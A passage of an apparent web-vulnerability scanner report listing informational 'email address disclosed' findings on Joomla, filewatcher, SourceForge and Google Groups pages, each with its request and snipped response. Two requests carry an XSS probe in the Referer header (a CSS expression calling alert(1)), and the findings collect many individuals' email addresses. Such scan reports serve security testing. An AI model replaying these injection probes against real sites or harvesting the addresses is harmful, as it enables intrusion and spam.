<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.59. http://dir.filewatcher.com/d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:42 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "tT6tidPH7IfBUdKWEEVcmQ"
Content-Length: 22893
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 173
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.60. http://dir.filewatcher.com/d/OpenBSD/snapshots/alpha/aub-2.0.5.tgz.32465.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/snapshots/alpha/aub-2.0.5.tgz.32465.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "RoWFpfcPc20SwbRr6yBiNw"
Content-Length: 23042
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 172
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.61. http://dir.filewatcher.com/d/Other/src/Applications/Communications/aub-2.0.5-10.src.rpm.82336.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/Other/src/Applications/Communications/aub-2.0.5-10.src.rpm.82336.html

Issue detail

The following email address was disclosed in the response:

om@filewatcher.org

Request

GET /d/Other/src/Applications/Communications/aub-2.0.5-10.src.rpm.82336.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:56 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 231
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.62. http://docs.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/

Issue detail

The following email address was disclosed in the response:

legal@opensourcematters.org

Request

GET / HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sat, 15 Jan 2011 18:24:51 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<a href="mailto:legal@opensourcematters.org" class="external text" title="mailto:legal@opensourcematters.org" rel="nofollow">legal@opensourcematters.org</a>
...[SNIP]...
<a href="mailto:legal@opensourcematters.org" class="external text" title="mailto:legal@opensourcematters.org" rel="nofollow">legal@opensourcematters.org</a>
...[SNIP]...

24.63. http://docs.joomla.org/Development_Working_Group previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Development_Working_Group

Issue detail

The following email address was disclosed in the response:

calendar@joomla.org

Request

GET /Development_Working_Group HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 19 Sep 2010 12:39:23 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<a href="http://www.google.com/calendar/embed?src=calendar@joomla.org" class="external text" title="http://www.google.com/calendar/embed?src=calendar@joomla.org" rel="nofollow">
...[SNIP]...

24.64. http://docs.joomla.org/Joomla!_Extension_Directory_FAQs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Joomla!_Extension_Directory_FAQs

Issue detail

The following email address was disclosed in the response:

team@extensions.joomla.org

Request

GET /Joomla!_Extension_Directory_FAQs HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Mon, 20 Sep 2010 18:01:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<a href="mailto:team@extensions.joomla.org" class="external text" title="mailto:team@extensions.joomla.org" rel="nofollow">team@extensions.joomla.org</a>
...[SNIP]...

24.65. http://docs.joomla.org/Tutorial:Creating_a_basic_Joomla!_template previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Tutorial:Creating_a_basic_Joomla!_template

Issue detail

The following email address was disclosed in the response:

john@example.com

Request

GET /Tutorial:Creating_a_basic_Joomla!_template HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Sun, 16 Jan 2011 13:42:39 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</span>john@example.com<span class="sc3">
...[SNIP]...

24.66. http://feeds.joomla.org/JoomlaSecurityNews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.joomla.org
Path:	/JoomlaSecurityNews

Issue detail

The following email addresses were disclosed in the response:

dextercowley@gmail.com
ian.maclennan@help.joomla.org

Request

GET /JoomlaSecurityNews HTTP/1.1
Host: feeds.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/xml; charset=UTF-8
ETag: /OLxMNY4upqeuGOHCTC+TV1Gu6I
Last-Modified: Mon, 24 Jan 2011 22:33:01 GMT
Date: Mon, 24 Jan 2011 22:35:36 GMT
Expires: Mon, 24 Jan 2011 22:35:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.joomla.org/~d
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...
<author>dextercowley@gmail.com (Mark Dexter)</author>
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...

24.67. http://golded-plus.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://golded-plus.sourceforge.net
Path:	/

Issue detail

The following email address was disclosed in the response:

asa@eed.miee.ru

Request

GET / HTTP/1.1
Host: golded-plus.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:35:43 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sun, 12 Mar 2006 19:35:39 GMT
ETag: "2ea1-40ed154b5d8c0"
Accept-Ranges: bytes
Content-Length: 11937
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:35:43 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>GoldED+</title>
   <link rev=made href="mailto:asa@eed.miee.ru">
   <style type=text/css>
       .titlebar {
           font-
...[SNIP]...

24.68. http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

Issue detail

The following email addresses were disclosed in the response:

85073eab-0140-46ab-8c0a-2f6a454f6578@k9g2000pre.googlegroups.com
donstockba...@hotmail.com

Request

GET /group/alt.slack/msg/fa1fe1e3e6c31c9b/x22 HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.69. http://groups.google.com/group/joomla-commits/topics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/group/joomla-commits/topics

Issue detail

The following email addresses were disclosed in the response:

hood...@jcode001.directrouter.com
infograf...@jcode001.directrouter.com
joomla-commits@joomlacode.org

Request

GET /group/joomla-commits/topics HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.70. http://groups.google.com/group/joomla-dev-framework previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/group/joomla-dev-framework

Issue detail

The following email addresses were disclosed in the response:

joomla-dev-framework@googlegroups.com
pdnmu...@gmail.com

Request

GET /group/joomla-dev-framework HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Jan 2011 22:35:59 GMT
Expires: Mon, 24 Jan 2011 22:35:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
<a href="/group/joomla-dev-framework/t/d9e17cd382a64f96" class="on">Digest for joomla-dev-framework@googlegroups.com - 2 Messages in 2 Topics</a>
...[SNIP]...
<span style="color: #777">
By pdnmu...@gmail.com -
Jan 13 - 1 author -
0 replies
</span>
...[SNIP]...
<a href="/group/joomla-dev-framework/t/5cb2e614a23a7cbf" class="on">Digest for joomla-dev-framework@googlegroups.com - 7 Messages in 1 Topic</a>
...[SNIP]...
<a href="mailto:joomla-dev-framework@googlegroups.com" class="on">joomla-dev-framework@googlegroups.com</a>
...[SNIP]...

24.71. http://groups.google.com/group/joomla-dev-general previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/group/joomla-dev-general

Issue detail

The following email address was disclosed in the response:

joomla-dev-general@googlegroups.com

Request

GET /group/joomla-dev-general HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Jan 2011 22:35:58 GMT
Expires: Mon, 24 Jan 2011 22:35:58 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
<a href="mailto:joomla-dev-general@googlegroups.com" class="on">joomla-dev-general@googlegroups.com</a>
...[SNIP]...

24.72. http://groups.google.com/group/joomlabugsquad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/group/joomlabugsquad

Issue detail

The following email address was disclosed in the response:

joomlabugsquad@googlegroups.com

Request

GET /group/joomlabugsquad HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Jan 2011 22:36:57 GMT
Expires: Mon, 24 Jan 2011 22:36:57 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
<a href="mailto:joomlabugsquad@googlegroups.com" class="on">joomlabugsquad@googlegroups.com</a>
...[SNIP]...

24.73. http://groups.google.com/groups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/groups

Issue detail

The following email address was disclosed in the response:

janus.nos...@magma.ca

Request

GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.74. http://home.arcor.de/kaffeetisch/slrnconf.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.arcor.de
Path:	/kaffeetisch/slrnconf.html

Issue detail

The following email address was disclosed in the response:

kaffeetisch@gmx.de

Request

GET /kaffeetisch/slrnconf.html HTTP/1.1
Host: home.arcor.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:24 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2260

<!doctype html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Schmih Schmah Schmuh - Programs - Slrnconf</title>
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<a href="mailto:kaffeetisch@gmx.de">
...[SNIP]...

24.75. http://husky.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://husky.sourceforge.net
Path:	/

Issue detail

The following email addresses were disclosed in the response:

husky-cvs@lists.sourceforge.net
husky-diffs@lists.sourceforge.net
husky-discuss@lists.sourceforge.net
mtt@tichy.de
tobi@physcip.uni-stuttgart.de

Request

GET / HTTP/1.1
Host: husky.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:36:27 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sun, 07 Jan 2007 16:20:17 GMT
ETag: "2051-42675b0423240"
Accept-Ranges: bytes
Content-Length: 8273
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:36:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">



<html>
<head>

<style type="text/css">
<!--
body {margin-top: 0; margin-left:
...[SNIP]...
<a href="mailto:mtt@tichy.de">
...[SNIP]...
<a href="mailto:tobi@physcip.uni-stuttgart.de">
...[SNIP]...
<a href="mailto:husky-discuss@lists.sourceforge.net">husky-discuss@lists.sourceforge.net</a>
...[SNIP]...
<li>via mailinglist: (husky-diffs@lists.sourceforge.net). You can
subscribe/unsubscribe using
<a href="http://lists.sourceforge.net/mailman/listinfo/husky-diffs">
...[SNIP]...
<li>via mailinglist: (husky-cvs@lists.sourceforge.net). You can
subscribe/unsubscribe using
<a href="http://lists.sourceforge.net/mailman/listinfo/husky-cvs">
...[SNIP]...

24.76. http://investor.autobytel.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investor.autobytel.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

jimh@autobytel.com
lberman@pondel.com

Request

GET / HTTP/1.1
Host: investor.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.77. http://joomlacode.org/gf/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/

Issue detail

The following email addresses were disclosed in the response:

infografjms@gmail.com
joomlacode@copyn.plus.com
juanfe@juanfeyana.com
mark@nealstudio.com
nbraczek@bsds.de
wfar01@yahoo.co.uk

Request

GET /gf/?action=Rss&section=activity&project_id=5 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:58:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 7581
Connection: close
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="ISO-8859-1"?>
<rss version="2.0">
<channel>
<title>JoomlaCode - Joomla! - Activity</title>
<link>http://joomlacode.org/gf/</link>
<description>Gforge Advanced Server RSS<
...[SNIP]...
<author>bill richardson <wfar01@yahoo.co.uk></author>
...[SNIP]...
<author>Mark Neal <mark@nealstudio.com></author>
...[SNIP]...
<author>bill richardson <wfar01@yahoo.co.uk></author>
...[SNIP]...
<author>bill richardson <wfar01@yahoo.co.uk></author>
...[SNIP]...
<author>Niels Braczek <nbraczek@bsds.de></author>
...[SNIP]...
<author>Geraint Edwards <joomlacode@copyn.plus.com></author>
...[SNIP]...
<author>Jean-Marie Simonet <infografjms@gmail.com></author>
...[SNIP]...
<author>Jean-Marie Simonet <infografjms@gmail.com></author>
...[SNIP]...
<author>Jean-Marie Simonet <infografjms@gmail.com></author>
...[SNIP]...
<author>Jean-Marie Simonet <infografjms@gmail.com></author>
...[SNIP]...
<author>Jean-Marie Simonet <infografjms@gmail.com></author>
...[SNIP]...
<author>Jean-Marie Simonet <infografjms@gmail.com></author>
...[SNIP]...
<author>Juan Felix Mateos <juanfe@juanfeyana.com></author>
...[SNIP]...
<author>Juan Felix Mateos <juanfe@juanfeyana.com></author>
...[SNIP]...
<author>bill richardson <wfar01@yahoo.co.uk></author>
...[SNIP]...

24.78. http://joomlacode.org/gf/project/bm01/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/bm01/

Issue detail

The following email address was disclosed in the response:

azmi@moduletech.com.my

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:45:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<span title="Click for alternate translations">Sebarang komen dan pandangan sila email ke azmi@moduletech.com.my </span>
...[SNIP]...

24.79. http://joomlacode.org/gf/project/joomla/scmsvn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/scmsvn/

Issue detail

The following email address was disclosed in the response:

root@joomlacode.org

Request

GET /gf/project/joomla/scmsvn/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<a href='/gf/project/joomla/scmsvn/?action=browse&path=mailto%3Aroot%40joomlacode.org'>root@joomlacode.org</a>
...[SNIP]...

24.80. http://joomlacode.org/mktree.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/mktree.js

Issue detail

The following email addresses were disclosed in the response:

matt@mattkruse.com
sil@kryogenix.org

Request

GET /mktree.js HTTP/1.1
Host: joomlacode.org
Proxy-Connection: keep-alive
Referer: http://joomlacode.org/gf/project/joomla/tracker/?3ee00%22style%3d%22x%3aexpression(alert(1))%22744e3c5545f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 31 Aug 2008 22:24:24 GMT
ETag: "13586a3-180f-455c8f2e8b600"
Accept-Ranges: bytes
Content-Length: 6159
Connection: close
Content-Type: application/x-javascript

// ===================================================================
// Author: Matt Kruse <matt@mattkruse.com>
// WWW: http://www.mattkruse.com/
//
// NOTICE: You may use this code for any purpose,
...[SNIP]...
name as being "liOpen" (see example)
/*
This code is inspired by and extended from Stuart Langridge's aqlist code:
       http://www.kryogenix.org/code/browser/aqlists/
       Stuart Langridge, November 2002
       sil@kryogenix.org
       Inspired by Aaron's labels.js (http://youngpup.net/demos/labels/)
       and Dave Lindquist's menuDropDown.js (http://www.gazingus.org/dhtml/?id=109)
*/

// Automatically attach a listener to the window
...[SNIP]...

24.81. http://joomlacode.org/tabber.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/tabber.js

Issue detail

The following email address was disclosed in the response:

pat@barelyfitz.com

Request

GET /tabber.js HTTP/1.1
Host: joomlacode.org
Proxy-Connection: keep-alive
Referer: http://joomlacode.org/gf/project/joomla/tracker/?3ee00%22style%3d%22x%3aexpression(alert(1))%22744e3c5545f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 31 Aug 2008 22:24:14 GMT
ETag: "13586ce-3ea7-455c8f2501f80"
Accept-Ranges: bytes
Content-Length: 16039
Connection: close
Content-Type: application/x-javascript

/*==================================================
$Id: tabber.js,v 1.9 2006/04/27 20:51:51 pat Exp $
tabber.js by Patrick Fitzgerald pat@barelyfitz.com

Documentation can be found at the following URL:
http://www.barelyfitz.com/projects/tabber/

License (http://www.opensource.org/licenses/mit-license.php)

Copyright (c) 2006 Patrick Fi
...[SNIP]...

24.82. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The following email addresses were disclosed in the response:

contact@appendTo.com
contact@appendto.com
hello@filamentgroup.com

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:38:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
